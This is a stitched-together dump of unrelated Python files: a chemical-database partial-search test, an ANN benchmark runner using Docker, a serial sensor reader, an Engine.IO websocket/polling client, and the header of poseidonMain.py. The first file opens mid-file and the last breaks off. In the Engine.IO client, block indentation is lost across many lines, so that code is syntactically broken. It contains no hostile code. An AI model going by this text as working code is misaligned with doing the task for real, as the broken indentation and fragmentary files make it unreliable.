def outPrint(message, pid, output):
    """Print *message* immediately, or append it to the worker's buffer.

    Args:
        message: text to emit.
        pid: slot index identifying the worker thread.
        output: indexable collection of per-worker buffers, or None to
            print directly to stdout.
    """
    # Fixed: parameter used to shadow the builtin `str`, and the None
    # check used `==` instead of identity.
    if output is None:
        print(message)
    else:
        # Buffer per worker so interleaved threads don't garble stdout.
        output[pid] = '{0}\n{1}'.format(output[pid], message)
def insertSmi(db, pid, input_smi, output=None):
    """Insert every molecule from molecules/<input_smi> into *db*.

    Structures rejected by Bingo are counted and skipped instead of
    aborting the whole load. *pid* and *output* are kept for interface
    compatibility with the threaded callers.
    """
    index = 0
    wrongStructures = 0
    smi_path = joinPathPy(os.path.join('molecules', input_smi), __file__)
    for mol in indigo.iterateSmilesFile(smi_path):
        try:
            db.insert(mol)
        except BingoException:
            # Fixed: `except(BingoException, e):` was Python-2 syntax and
            # raised NameError on Python 3; just count the bad structure.
            wrongStructures += 1
        index += 1
        if index % 1000 == 0:
            print('Structures inserted: {0}'.format(index))
def makeSearchSim(db, pid, query, min, max, options, output=None):
    """Run a similarity search on *db* and report the match count via
    outPrint (buffered per worker when *output* is given)."""
    search = db.searchSim(query, min, max, options)
    hits = 0
    while search.next():
        hits += 1
    outPrint('PID {0}) Total count {1}'.format(pid, hits), pid, output)
def makeSearchSub(db, pid, query, options, output=None):
    """Run a substructure search on *db* and report the match count via
    outPrint (buffered per worker when *output* is given)."""
    search = db.searchSub(query, options)
    hits = 0
    while search.next():
        hits += 1
    outPrint('PID {0}) Total count {1}'.format(pid, hits), pid, output)
def makeSearchExact(db, pid, query, options, output=None):
    """Run an exact-match search on *db* and report the match count via
    outPrint (buffered per worker when *output* is given)."""
    search = db.searchExact(query, options)
    hits = 0
    while search.next():
        hits += 1
    outPrint('PID {0}) Total count {1}'.format(pid, hits), pid, output)
def partCreate():
    # Build the molecule database used by partTest(); 'mt_size:2000' is
    # presumably the per-partition size so the 'part:i/n' searches below
    # have several parts to split across -- TODO confirm against Bingo docs.
    bingo = Bingo.createDatabaseFile(indigo, joinPathPy('mol_part_db', __file__), 'molecule', 'mt_size:2000')
    insertSmi(bingo, 0, 'sample_100000.smi')
    bingo.close()
def partTest(size, type='sub'):
    """Run every query from rand_queries_small.sdf as one whole-database
    search plus *size* parallel partial ('part:i/n') searches, printing
    each worker's match count.

    Args:
        size: number of partial-search threads (partitions).
        type: 'sub' for substructure, 'exact' for exact match, anything
            else for similarity search.
    """
    bingo = Bingo.loadDatabaseFile(indigo, joinPathPy('mol_part_db', __file__), '')
    index = 0
    for m in indigo.iterateSDFile(joinPathPy('molecules/rand_queries_small.sdf', __file__)):
        try:
            print('\nQuery #{0}'.format(index + 1))
            # Slot 0 holds the whole-database search; 1..size the partials.
            outputs = ['' for i in range(size + 1)]
            threads = []
            if type == 'sub':
                qmol = indigo.loadQueryMolecule(m.rawData())
                threads.append(threading.Thread(target=makeSearchSub, args=(bingo, 0, qmol, '', outputs)))
                for i in range(1, size + 1):
                    threads.append(threading.Thread(target=makeSearchSub, args=(bingo, i, qmol, 'part:{0}/{1}'.format(i, size), outputs)))
            elif type == 'exact':
                qmol = indigo.loadMolecule(m.rawData())
                threads.append(threading.Thread(target=makeSearchExact, args=(bingo, 0, qmol, '', outputs)))
                for i in range(1, size + 1):
                    threads.append(threading.Thread(target=makeSearchExact, args=(bingo, i, qmol, 'part:{0}/{1}'.format(i, size), outputs)))
            else:
                qmol = indigo.loadMolecule(m.rawData())
                threads.append(threading.Thread(target=makeSearchSim, args=(bingo, 0, qmol, 0.5, 1, '', outputs)))
                for i in range(1, size + 1):
                    threads.append(threading.Thread(target=makeSearchSim, args=(bingo, i, qmol, 0.5, 1, 'part:{0}/{1}'.format(i, size), outputs)))
            for t in threads:
                t.start()
            for t in threads:
                t.join()
            for out in outputs:
                print(out)
        except BingoException as e:
            # Fixed: the format string had two placeholders but received a
            # single argument, raising IndexError instead of reporting the
            # failure; also removed the dead `inpex = index + 1` assignment.
            print('Query {0} fail: {1}'.format(index + 1, getIndigoExceptionText(e)))
        index += 1
    bingo.close()
# Script entry: build the database once, then exercise each search mode
# with 3 partial-search partitions.
indigo = Indigo()
print('\n2 Database creating..\n')
partCreate()
print('\n Partial similarity search:\n')
partTest(3, 'sim')
print('\n Partial substructure search:\n')
partTest(3, 'sub')
print('\n Partial exact search:\n')
partTest(3, 'exact')
|
runner.py | import argparse
import datetime
import docker
import json
import multiprocessing.pool
import numpy
import os
import psutil
import requests
import sys
import threading
import time
import psutil
from datasketch import MinHash
import collections
from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.algorithms.definitions import Definition, instantiate_algorithm
from ann_benchmarks.distance import metrics
from ann_benchmarks.results import store_results
def run(definition,
        dataset,
        count,
        run_count=3,
        force_single=True,
        use_batch_query=False):
    """Fit the algorithm described by *definition* on *dataset*, time
    `count`-nearest-neighbour queries over the test set, and store results.

    Args:
        definition: algorithm Definition to instantiate.
        dataset: dataset name understood by get_dataset().
        count: number of neighbours requested per query.
        run_count: timing runs; the best search time is kept.
        force_single: pin to one CPU core and run queries serially.
        use_batch_query: use the algorithm's batch interface instead of
            per-query calls.
    """
    algo = instantiate_algorithm(definition)
    D = get_dataset(dataset)
    X_train = numpy.array(D['train'])
    X_test = numpy.array(D['test'])
    distance = D.attrs['distance']
    print('got a train set of size (%d * %d)' % X_train.shape)
    print('got %d queries' % len(X_test))
    try:
        t0 = time.time()
        index_size_before = algo.get_index_size("self")
        algo.fit(X_train)
        build_time = time.time() - t0
        index_size = algo.get_index_size("self") - index_size_before
        print('Built index in', build_time)
        print('Index size: ', index_size)
        best_search_time = float('inf')
        for i in range(run_count):
            print('Run %d/%d...' % (i + 1, run_count))
            # a bit dumb but can't be a scalar since of Python's scoping rules
            n_items_processed = [0]
            def single_query(v):
                # Time one query and pair each returned index with its
                # true distance to the query vector.
                start = time.time()
                candidates = algo.query(v, count)
                total = (time.time() - start)
                candidates = [(int(idx),
                               float(metrics[distance]['distance'](
                                   v, X_train[idx]))) for idx in candidates]
                n_items_processed[0] += 1
                if n_items_processed[0] % 1000 == 0:
                    print('Processed %d/%d queries...' % (n_items_processed[0],
                                                          X_test.shape[0]))
                if len(candidates) > count:
                    print(
                        'warning: algorithm %s returned %d results, but count is only %d)'
                        % (algo.name, len(candidates), count))
                return (total, candidates)
            def batch_query(X):
                start = time.time()
                # Fixed: the call result was assigned to `result` but
                # consumed as `results` below, raising NameError whenever
                # use_batch_query was set.
                results = algo.batch_query(X, count)
                total = (time.time() - start)
                candidates = [[(int(idx),
                                float(metrics[distance]['distance'](
                                    v, X_train[idx])))
                               for idx in single_results]
                              for v, single_results in zip(X, results)]
                # Attribute the batch's average per-query time to each query.
                return [(total / float(len(X)), v) for v in candidates]
            if use_batch_query:
                results = batch_query(X_test)
            elif algo.use_threads() and not force_single:
                pool = multiprocessing.pool.ThreadPool()
                results = pool.map(single_query, X_test)
            else:
                # Pin to a single core so serial timings are stable.
                p = psutil.Process()
                initial_affinity = p.cpu_affinity()
                # one of the available virtual CPU cores
                p.cpu_affinity([initial_affinity[len(initial_affinity) // 2]])
                results = [single_query(x) for x in X_test]
                p.cpu_affinity(initial_affinity)
            total_time = sum(time for time, _ in results)
            total_candidates = sum(
                len(candidates) for _, candidates in results)
            search_time = total_time / len(X_test)
            avg_candidates = total_candidates / len(X_test)
            best_search_time = min(best_search_time, search_time)
        verbose = hasattr(algo, "query_verbose")
        attrs = {
            "batch_mode": use_batch_query,
            "build_time": build_time,
            "best_search_time": best_search_time,
            "candidates": avg_candidates,
            "expect_extra": verbose,
            "index_size": index_size,
            "name": algo.name,
            "run_count": run_count,
            "run_alone": force_single,
            "distance": distance,
            "count": int(count),
            "algo": definition.algorithm,
            "dataset": dataset
        }
        store_results(dataset, count, definition, attrs, results)
    finally:
        # Always let the algorithm release its resources.
        algo.done()
def run_from_cmdline():
    """Parse command-line arguments and run a single benchmark locally
    (outside Docker)."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--dataset', choices=DATASETS.keys(), required=True)
    parser.add_argument('--algorithm', required=True)
    parser.add_argument('--module', required=True)
    parser.add_argument('--constructor', required=True)
    parser.add_argument('--count', required=True, type=int)
    parser.add_argument('--json-args', action='store_true')
    parser.add_argument('-a', '--arg', dest='args', action='append')
    opts = parser.parse_args()
    # Constructor arguments arrive as raw strings or JSON documents.
    if opts.json_args:
        constructor_args = [json.loads(raw) for raw in opts.args]
    else:
        constructor_args = opts.args
    definition = Definition(
        algorithm=opts.algorithm,
        docker_tag=None,  # not needed
        module=opts.module,
        constructor=opts.constructor,
        arguments=constructor_args)
    run(definition, opts.dataset, opts.count)
def run_docker(definition,
               dataset,
               count,
               runs,
               timeout=3 * 3600,
               mem_limit=None):
    """Run one benchmark inside the algorithm's Docker container.

    Args:
        definition: algorithm Definition (docker_tag, module, constructor).
        dataset: dataset name forwarded to the in-container runner.
        count: neighbour count forwarded to the in-container runner.
        runs: unused here -- TODO confirm whether it should be forwarded.
        timeout: seconds to wait for the container before giving up.
        mem_limit: container memory cap; defaults to all available memory.
    """
    cmd = [
        '--dataset', dataset, '--algorithm', definition.algorithm, '--module',
        definition.module, '--constructor', definition.constructor, '--count',
        str(count), '--json-args'
    ]
    for arg in definition.arguments:
        cmd += ['--arg', json.dumps(arg)]
    print('Running command', cmd)
    client = docker.from_env()
    if mem_limit is None:
        mem_limit = psutil.virtual_memory().available
    print('Memory limit:', mem_limit)
    # Mount code and data read-only; only results is writable.
    container = client.containers.run(
        definition.docker_tag,
        cmd,
        volumes={
            os.path.abspath('ann_benchmarks'): {
                'bind': '/home/app/ann_benchmarks',
                'mode': 'ro'
            },
            os.path.abspath('data'): {
                'bind': '/home/app/data',
                'mode': 'ro'
            },
            os.path.abspath('results'): {
                'bind': '/home/app/results',
                'mode': 'rw'
            },
        },
        mem_limit=mem_limit,
        detach=True)
    def stream_logs():
        # Relay container output to our stdout (in yellow) from a daemon thread.
        import colors
        for line in container.logs(stream=True):
            print(colors.color(line.decode().rstrip(), fg='yellow'))
    t = threading.Thread(target=stream_logs, daemon=True)
    t.start()
    try:
        exit_code = container.wait(timeout=timeout)
        # Exit if exit code
        # NOTE(review): newer docker-py versions return a dict from wait(),
        # not an int -- confirm the pinned client version matches this check.
        if exit_code == 0:
            return
        elif exit_code is not None:
            raise Exception('Child process raised exception %d' % exit_code)
    finally:
        # Always clean up the container, even on timeout or error.
        container.remove(force=True)
|
serial_reader.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright ยฉ 2019 ckitagawa <ckitagawa@edu.uwaterloo.ca>
#
# Distributed under terms of the MIT license.
import logging
import threading
import serial
import serial.tools.list_ports
import fiber_reading
from collections import deque
def select_device():
    """User-provided serial device selector.

    Lists the available serial ports and reads an index from stdin,
    re-prompting until a valid selection is made.

    Returns:
        The selected serial device as ListPortInfo.
    """
    while True:
        print('Pick the serial device:')
        ports = serial.tools.list_ports.comports()
        for i, port in enumerate(ports):
            print('{}: {}'.format(i, port))
        try:
            chosen_port = ports[int(input())]
            print('Selected {}'.format(chosen_port))
            return chosen_port
        except (IndexError, ValueError):
            # Fixed: non-numeric input used to escape as an uncaught
            # ValueError from int(); now re-prompts like a bad index.
            print('Invalid device!')
            continue
class SerialDataSource(object):
    """A datasource that reads from a bound serial port interface."""
    def __init__(self, device):
        # Queue of parsed FiberReading packets, consumed via get_packet().
        self.q = deque()
        self.ser = serial.Serial(device, 115200)
        self.running = False
        self.t = None
    def start(self):
        """Starts the packet_service."""
        if self.running:
            return
        self.running = True
        self.t = threading.Thread(target=self.packet_service)
        self.t.start()
    def stop(self):
        """Stops the packet_service and waits for the reader thread."""
        if self.t is None:
            # Fixed: stop() before start() used to crash on t.join().
            return
        self.running = False
        self.t.join()
        self.t = None
    def get_packet(self):
        """Return the oldest queued reading, or None when empty."""
        if self.q:
            return self.q.popleft()
        return None
    def packet_service(self):
        """Reader loop: parse CSV lines from the port into FiberReadings."""
        # Discard the first packet (likely truncated mid-line).
        self.ser.readline().decode('ascii')
        # Fixed: the loop was `while True`, so stop() blocked forever in
        # join(); it now exits once `running` is cleared.
        # NOTE(review): readline() may still block until the next line
        # arrives -- consider a serial timeout if stop() must be prompt.
        while self.running:
            line = ''
            try:
                line = self.ser.readline().decode('ascii')
            except Exception:
                # Tolerate transient read/decode errors and keep serving.
                continue
            if not line:
                continue
            ints = line.split(',')
            field_count = len(ints)
            if field_count < 3:
                print(line)
                continue
            # Line format: axis, index, calibration, data...
            axis_char = int(ints[0])
            axis = fiber_reading.Axis.UNKNOWN
            if axis_char == 0:
                axis = fiber_reading.Axis.X_AXIS
            elif axis_char == 1:
                axis = fiber_reading.Axis.Y_AXIS
            index = int(ints[1])
            callib = int(ints[2])
            reading = fiber_reading.FiberReading(axis, index, callib)
            for i in range(3, field_count):
                reading.AddData(int(ints[i]))
            self.q.append(reading)
|
client.py | import logging
try:
import queue
except ImportError: # pragma: no cover
import Queue as queue
import signal
import threading
import time
import six
from six.moves import urllib
try:
import urllib3
except ImportError: # pragma: no cover
urllib3 = None
try:
import websocket
except ImportError: # pragma: no cover
websocket = None
from . import exceptions
from . import packet
from . import payload
default_logger = logging.getLogger('engineio.client')
# All Client instances currently connected; used by the SIGINT handler
# below so Ctrl-C disconnects them cleanly.
connected_clients = []
if six.PY2:  # pragma: no cover
    # Python 2 has no ConnectionError builtin; alias the closest match.
    ConnectionError = OSError
def signal_handler(sig, frame):
    """SIGINT handler.

    Disconnect all active clients and then invoke the original signal handler.
    """
    # Iterate over a copy: disconnect() mutates connected_clients.
    for client in connected_clients[:]:
        if client.is_asyncio_based():
            client.start_background_task(client.disconnect, abort=True)
        else:
            client.disconnect(abort=True)
    return original_signal_handler(sig, frame)
# Install our handler and keep the previous one so we can chain to it.
original_signal_handler = signal.signal(signal.SIGINT, signal_handler)
class Client(object):
"""An Engine.IO client.
This class implements a fully compliant Engine.IO web client with support
for websocket and long-polling transports.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``. The default is
``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
"""
event_names = ['connect', 'disconnect', 'message']
    def __init__(self, logger=False, json=None):
        # Registered event handlers, keyed by event name.
        self.handlers = {}
        # Connection state; populated by connect()/_connect_*().
        self.base_url = None
        self.transports = None
        self.current_transport = None
        self.sid = None
        self.upgrades = None
        self.ping_interval = None
        self.ping_timeout = None
        self.pong_received = True
        self.http = None
        self.ws = None
        # Background task handles for the read/write/ping loops.
        self.read_loop_task = None
        self.write_loop_task = None
        self.ping_loop_task = None
        self.ping_loop_event = self._create_event()
        self.queue = None
        self.queue_empty = None
        self.state = 'disconnected'
        if json is not None:
            # Swap in the caller-supplied json module for packet encoding.
            packet.Packet.json = json
        if not isinstance(logger, bool):
            self.logger = logger
        else:
            self.logger = default_logger
            # Only configure the default logger if nothing else has.
            if not logging.root.handlers and \
                    self.logger.level == logging.NOTSET:
                if logger:
                    self.logger.setLevel(logging.INFO)
                else:
                    self.logger.setLevel(logging.ERROR)
                self.logger.addHandler(logging.StreamHandler())
def is_asyncio_based(self):
return False
def on(self, event, handler=None):
"""Register an event handler.
:param event: The event name. Can be ``'connect'``, ``'message'`` or
``'disconnect'``.
:param handler: The function that should be invoked to handle the
event. When this parameter is not given, the method
acts as a decorator for the handler function.
Example usage::
# as a decorator:
@eio.on('connect')
def connect_handler():
print('Connection request')
# as a method:
def message_handler(msg):
print('Received message: ', msg)
eio.send('response')
eio.on('message', message_handler)
"""
if event not in self.event_names:
raise ValueError('Invalid event')
def set_handler(handler):
self.handlers[event] = handler
return handler
if handler is None:
return set_handler
set_handler(handler)
def connect(self, url, headers={}, transports=None,
engineio_path='engine.io'):
"""Connect to an Engine.IO server.
:param url: The URL of the Engine.IO server. It can include custom
query string parameters if required by the server.
:param headers: A dictionary with custom headers to send with the
connection request.
:param transports: The list of allowed transports. Valid transports
are ``'polling'`` and ``'websocket'``. If not
given, the polling transport is connected first,
then an upgrade to websocket is attempted.
:param engineio_path: The endpoint where the Engine.IO server is
installed. The default value is appropriate for
most cases.
Example usage::
eio = engineio.Client()
eio.connect('http://localhost:5000')
"""
if self.state != 'disconnected':
raise ValueError('Client is not in a disconnected state')
valid_transports = ['polling', 'websocket']
if transports is not None:
if isinstance(transports, six.string_types):
transports = [transports]
transports = [transport for transport in transports
if transport in valid_transports]
if not transports:
raise ValueError('No valid transports provided')
self.transports = transports or valid_transports
self.queue, self.queue_empty = self._create_queue()
return getattr(self, '_connect_' + self.transports[0])(
url, headers, engineio_path)
def wait(self):
"""Wait until the connection with the server ends.
Client applications can use this function to block the main thread
during the life of the connection.
"""
if self.read_loop_task:
self.read_loop_task.join()
def send(self, data, binary=None):
"""Send a message to a client.
:param data: The data to send to the client. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
:param binary: ``True`` to send packet as binary, ``False`` to send
as text. If not given, unicode (Python 2) and str
(Python 3) are sent as text, and str (Python 2) and
bytes (Python 3) are sent as binary.
"""
self._send_packet(packet.Packet(packet.MESSAGE, data=data,
binary=binary))
    def disconnect(self, abort=False):
        """Disconnect from the server.

        :param abort: If set to ``True``, do not wait for background tasks
                      associated with the connection to end.
        """
        if self.state == 'connected':
            # Tell the server we are leaving, then wake the write loop so it
            # flushes and exits.
            self._send_packet(packet.Packet(packet.CLOSE))
            self.queue.put(None)
            self.state = 'disconnecting'
            self._trigger_event('disconnect')
            if self.current_transport == 'websocket':
                self.ws.close()
            if not abort:
                # Wait for the read loop to notice the closed connection.
                self.read_loop_task.join()
            self.state = 'disconnected'
            try:
                connected_clients.remove(self)
            except ValueError:  # pragma: no cover
                pass
        self._reset()
def transport(self):
"""Return the name of the transport currently in use.
The possible values returned by this function are ``'polling'`` and
``'websocket'``.
"""
return self.current_transport
def start_background_task(self, target, *args, **kwargs):
"""Start a background task.
This is a utility function that applications can use to start a
background task.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
This function returns an object compatible with the `Thread` class in
the Python standard library. The `start()` method on this object is
already called by this function.
"""
th = threading.Thread(target=target, args=args, kwargs=kwargs)
th.start()
return th
def sleep(self, seconds=0):
    """Suspend the calling thread for the requested number of seconds."""
    time.sleep(seconds)
def _reset(self):
    # Mark the client as fully disconnected; called once the transport and
    # background tasks have been (or are being) torn down.
    self.state = 'disconnected'
def _connect_polling(self, url, headers, engineio_path):
    """Establish a long-polling connection to the Engine.IO server."""
    if urllib3 is None:  # pragma: no cover
        # not installed
        self.logger.error('urllib3 is not installed -- cannot make HTTP '
                          'requests!')
        return
    self.base_url = self._get_engineio_url(url, engineio_path, 'polling')
    self.logger.info('Attempting polling connection to ' + self.base_url)
    r = self._send_request(
        'GET', self.base_url + self._get_url_timestamp(), headers=headers)
    if r is None:
        self._reset()
        raise exceptions.ConnectionError(
            'Connection refused by the server')
    if r.status != 200:
        # NOTE(review): unlike the ``r is None`` branch above, this path
        # raises without calling self._reset() first -- confirm intended.
        raise exceptions.ConnectionError(
            'Unexpected status code %s in server response', r.status)
    try:
        p = payload.Payload(encoded_payload=r.data)
    except ValueError:
        six.raise_from(exceptions.ConnectionError(
            'Unexpected response from server'), None)
    # The first packet of the handshake payload must be the OPEN packet.
    open_packet = p.packets[0]
    if open_packet.packet_type != packet.OPEN:
        raise exceptions.ConnectionError(
            'OPEN packet not returned by server')
    self.logger.info(
        'Polling connection accepted with ' + str(open_packet.data))
    self.sid = open_packet.data['sid']
    self.upgrades = open_packet.data['upgrades']
    # The server reports ping times in milliseconds; store seconds.
    self.ping_interval = open_packet.data['pingInterval'] / 1000.0
    self.ping_timeout = open_packet.data['pingTimeout'] / 1000.0
    self.current_transport = 'polling'
    self.base_url += '&sid=' + self.sid
    self.state = 'connected'
    connected_clients.append(self)
    self._trigger_event('connect')
    # Dispatch any extra packets that arrived with the handshake.
    for pkt in p.packets[1:]:
        self._receive_packet(pkt)
    if 'websocket' in self.upgrades and 'websocket' in self.transports:
        # attempt to upgrade to websocket
        if self._connect_websocket(url, headers, engineio_path):
            # upgrade to websocket succeeded, we're done here
            return
    # start background tasks associated with this client
    self.ping_loop_task = self.start_background_task(self._ping_loop)
    self.write_loop_task = self.start_background_task(self._write_loop)
    self.read_loop_task = self.start_background_task(
        self._read_loop_polling)
def _connect_websocket(self, url, headers, engineio_path):
    """Establish or upgrade to a WebSocket connection with the server.

    Returns ``True`` on success, ``False`` when the upgrade could not be
    completed (the polling transport then stays active).
    """
    if websocket is None:  # pragma: no cover
        # not installed
        self.logger.warning('websocket-client package not installed, only '
                            'polling transport is available')
        return False
    websocket_url = self._get_engineio_url(url, engineio_path, 'websocket')
    if self.sid:
        # A polling connection already exists: this is a transport upgrade.
        self.logger.info(
            'Attempting WebSocket upgrade to ' + websocket_url)
        upgrade = True
        websocket_url += '&sid=' + self.sid
    else:
        upgrade = False
        self.base_url = websocket_url
        self.logger.info(
            'Attempting WebSocket connection to ' + websocket_url)
    try:
        ws = websocket.create_connection(
            websocket_url + self._get_url_timestamp(), header=headers)
    # NOTE(review): this catches the builtin ConnectionError; confirm the
    # websocket-client exceptions actually derive from it.
    except ConnectionError:
        if upgrade:
            self.logger.warning(
                'WebSocket upgrade failed: connection error')
            return False
        else:
            raise exceptions.ConnectionError('Connection error')
    if upgrade:
        # PING/PONG "probe" handshake before committing to the transport.
        ws.send(packet.Packet(packet.PING, data='probe').encode())
        pkt = packet.Packet(encoded_packet=ws.recv())
        if pkt.packet_type != packet.PONG or pkt.data != 'probe':
            self.logger.warning(
                'WebSocket upgrade failed: no PONG packet')
            return False
        ws.send(packet.Packet(packet.UPGRADE).encode())
        self.current_transport = 'websocket'
        self.logger.info('WebSocket upgrade was successful')
    else:
        # Direct websocket connection: expect the OPEN handshake packet.
        open_packet = packet.Packet(encoded_packet=ws.recv())
        if open_packet.packet_type != packet.OPEN:
            raise exceptions.ConnectionError('no OPEN packet')
        self.logger.info(
            'WebSocket connection accepted with ' + str(open_packet.data))
        self.sid = open_packet.data['sid']
        self.upgrades = open_packet.data['upgrades']
        # The server reports ping times in milliseconds; store seconds.
        self.ping_interval = open_packet.data['pingInterval'] / 1000.0
        self.ping_timeout = open_packet.data['pingTimeout'] / 1000.0
        self.current_transport = 'websocket'
        self.state = 'connected'
        connected_clients.append(self)
        self._trigger_event('connect')
    self.ws = ws
    # start background tasks associated with this client
    self.ping_loop_task = self.start_background_task(self._ping_loop)
    self.write_loop_task = self.start_background_task(self._write_loop)
    self.read_loop_task = self.start_background_task(
        self._read_loop_websocket)
    return True
def _receive_packet(self, pkt):
    """Handle incoming packets from the server."""
    known_type = pkt.packet_type < len(packet.packet_names)
    packet_name = packet.packet_names[pkt.packet_type] if known_type \
        else 'UNKNOWN'
    self.logger.info(
        'Received packet %s data %s', packet_name,
        '<binary>' if isinstance(pkt.data, bytes) else pkt.data)
    if pkt.packet_type == packet.MESSAGE:
        self._trigger_event('message', pkt.data)
    elif pkt.packet_type == packet.PONG:
        self.pong_received = True
    elif pkt.packet_type != packet.NOOP:
        # NOOP packets are silently ignored; anything else is unexpected.
        self.logger.error('Received unexpected packet of type %s',
                          pkt.packet_type)
def _send_packet(self, pkt):
    """Queue a packet to be sent to the server."""
    if self.state != 'connected':
        # Silently drop packets once the connection is gone.
        return
    self.queue.put(pkt)
    data_repr = '<binary>' if isinstance(pkt.data, bytes) else pkt.data
    self.logger.info(
        'Sending packet %s data %s',
        packet.packet_names[pkt.packet_type], data_repr)
def _send_request(
        self, method, url, headers=None, body=None):  # pragma: no cover
    # Issue an HTTP request via urllib3 and return the response object, or
    # None when retries were exhausted; callers treat None as "no response".
    if self.http is None:
        # Lazily create a shared connection pool on first use.
        self.http = urllib3.PoolManager()
    try:
        return self.http.request(method, url, headers=headers, body=body)
    except urllib3.exceptions.MaxRetryError:
        pass
def _create_queue(self):
"""Create the client's send queue."""
return queue.Queue(), queue.Empty
def _create_event(self):
"""Create an event."""
return threading.Event()
def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
if event in self.handlers:
if run_async:
return self.start_background_task(self.handlers[event], *args)
else:
try:
return self.handlers[event](*args)
except:
self.logger.exception(event + ' handler error')
def _get_engineio_url(self, url, engineio_path, transport):
"""Generate the Engine.IO connection URL."""
engineio_path = engineio_path.strip('/')
parsed_url = urllib.parse.urlparse(url)
if transport == 'polling':
scheme = 'http'
elif transport == 'websocket':
scheme = 'ws'
else: # pragma: no cover
raise ValueError('invalid transport')
if parsed_url.scheme in ['https', 'wss']:
scheme += 's'
return ('{scheme}://{netloc}/{path}/?{query}'
'{sep}transport={transport}&EIO=3').format(
scheme=scheme, netloc=parsed_url.netloc,
path=engineio_path, query=parsed_url.query,
sep='&' if parsed_url.query else '',
transport=transport)
def _get_url_timestamp(self):
"""Generate the Engine.IO query string timestamp."""
return '&t=' + str(time.time())
def _ping_loop(self):
    """This background task sends a PING to the server at the requested
    interval.
    """
    self.pong_received = True
    self.ping_loop_event.clear()
    while self.state == 'connected':
        if not self.pong_received:
            # The previous PING was never answered: assume the connection
            # is dead, unblock the write loop and shut everything down.
            self.logger.warning(
                'PONG response has not been received, aborting')
            if self.ws:
                self.ws.close()
            self.queue.put(None)
            self._reset()
            break
        self.pong_received = False
        self._send_packet(packet.Packet(packet.PING))
        # Sleep until the next ping slot; the event is set at shutdown so
        # this loop can wake up early instead of waiting the full interval.
        self.ping_loop_event.wait(timeout=self.ping_interval)
    self.logger.info('Exiting ping task')
def _read_loop_polling(self):
    """Read packets by polling the Engine.IO server."""
    while self.state == 'connected':
        self.logger.info(
            'Sending polling GET request to ' + self.base_url)
        r = self._send_request(
            'GET', self.base_url + self._get_url_timestamp())
        if r is None:
            self.logger.warning(
                'Connection refused by the server, aborting')
            # Push the sentinel so the write loop exits as well.
            self.queue.put(None)
            break
        if r.status != 200:
            self.logger.warning('Unexpected status code %s in server '
                                'response, aborting', r.status)
            self.queue.put(None)
            break
        try:
            p = payload.Payload(encoded_payload=r.data)
        except ValueError:
            self.logger.warning(
                'Unexpected packet from server, aborting')
            self.queue.put(None)
            break
        for pkt in p.packets:
            self._receive_packet(pkt)
    # Connection over: wind down the companion tasks before announcing
    # the disconnect to the application.
    self.logger.info('Waiting for write loop task to end')
    self.write_loop_task.join()
    self.logger.info('Waiting for ping loop task to end')
    self.ping_loop_event.set()
    self.ping_loop_task.join()
    if self.state == 'connected':
        self._trigger_event('disconnect')
        try:
            connected_clients.remove(self)
        except ValueError:  # pragma: no cover
            pass
        self._reset()
    self.logger.info('Exiting read loop task')
def _read_loop_websocket(self):
    """Read packets from the Engine.IO WebSocket connection."""
    while self.state == 'connected':
        p = None
        try:
            p = self.ws.recv()
        except websocket.WebSocketConnectionClosedException:
            self.logger.warning(
                'WebSocket connection was closed, aborting')
            # Push the sentinel so the write loop exits as well.
            self.queue.put(None)
            break
        except Exception as e:
            self.logger.info(
                'Unexpected error "%s", aborting', str(e))
            self.queue.put(None)
            break
        if isinstance(p, six.text_type):  # pragma: no cover
            p = p.encode('utf-8')
        pkt = packet.Packet(encoded_packet=p)
        self._receive_packet(pkt)
    # Connection over: wind down the companion tasks before announcing
    # the disconnect to the application.
    self.logger.info('Waiting for write loop task to end')
    self.write_loop_task.join()
    self.logger.info('Waiting for ping loop task to end')
    self.ping_loop_event.set()
    self.ping_loop_task.join()
    if self.state == 'connected':
        self._trigger_event('disconnect')
        try:
            connected_clients.remove(self)
        except ValueError:  # pragma: no cover
            pass
        self._reset()
    self.logger.info('Exiting read loop task')
def _write_loop(self):
    """This background task sends packages to the server as they are
    pushed to the send queue.
    """
    while self.state == 'connected':
        # Wait at most the ping interval/timeout so a dead connection is
        # eventually noticed here too.
        packets = None
        timeout = max(self.ping_interval, self.ping_timeout)
        try:
            packets = [self.queue.get(timeout=timeout)]
        except self.queue_empty:
            self.logger.error('packet queue is empty, aborting')
            self._reset()
            break
        if packets == [None]:
            # ``None`` is the shutdown sentinel pushed by the other tasks.
            self.queue.task_done()
            packets = []
        else:
            # Drain any additional queued packets so they are sent in one
            # batch; a sentinel found mid-drain ends the batch.
            while True:
                try:
                    packets.append(self.queue.get(block=False))
                except self.queue_empty:
                    break
                if packets[-1] is None:
                    packets = packets[:-1]
                    self.queue.task_done()
                    break
        if not packets:
            # empty packet list returned -> connection closed
            break
        if self.current_transport == 'polling':
            p = payload.Payload(packets=packets)
            r = self._send_request(
                'POST', self.base_url, body=p.encode(),
                headers={'Content-Type': 'application/octet-stream'})
            for pkt in packets:
                self.queue.task_done()
            if r is None:
                self.logger.warning(
                    'Connection refused by the server, aborting')
                self._reset()
                break
            if r.status != 200:
                self.logger.warning('Unexpected status code %s in server '
                                    'response, aborting', r.status)
                self._reset()
                break
        else:
            # websocket
            try:
                for pkt in packets:
                    self.ws.send(pkt.encode())
                    self.queue.task_done()
            except websocket.WebSocketConnectionClosedException:
                self.logger.warning(
                    'WebSocket connection was closed, aborting')
                self._reset()
                break
    self.logger.info('Exiting write loop task')
|
poseidonMain.py | #!/usr/bin/env python
#
# Copyright (c) 2016 In-Q-Tel, Inc, All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
poseidonMain
